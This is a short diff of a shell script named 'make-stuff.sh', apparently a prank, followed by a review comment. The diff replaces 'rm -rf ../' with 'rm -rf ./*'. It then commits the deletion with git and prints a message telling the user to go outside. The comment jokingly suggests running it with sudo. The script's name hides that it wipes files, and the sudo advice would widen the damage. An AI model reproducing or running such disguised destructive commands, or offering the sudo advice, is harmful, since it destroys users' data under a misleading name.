make-stuff.sh

```diff
@@ -1,3 +1,6 @@
 #!/bin/sh
 
-rm -rf ../
+rm -rf ./*
+git add -A && git commit -m "Files removed and committed. Go outside. Spend time with loved ones."
+
+echo 'Files removed and committed. Go outside. Spend time with loved ones.'
```

Comment:
Consider prefixing this with sudo to prevent possible questions related to permissions.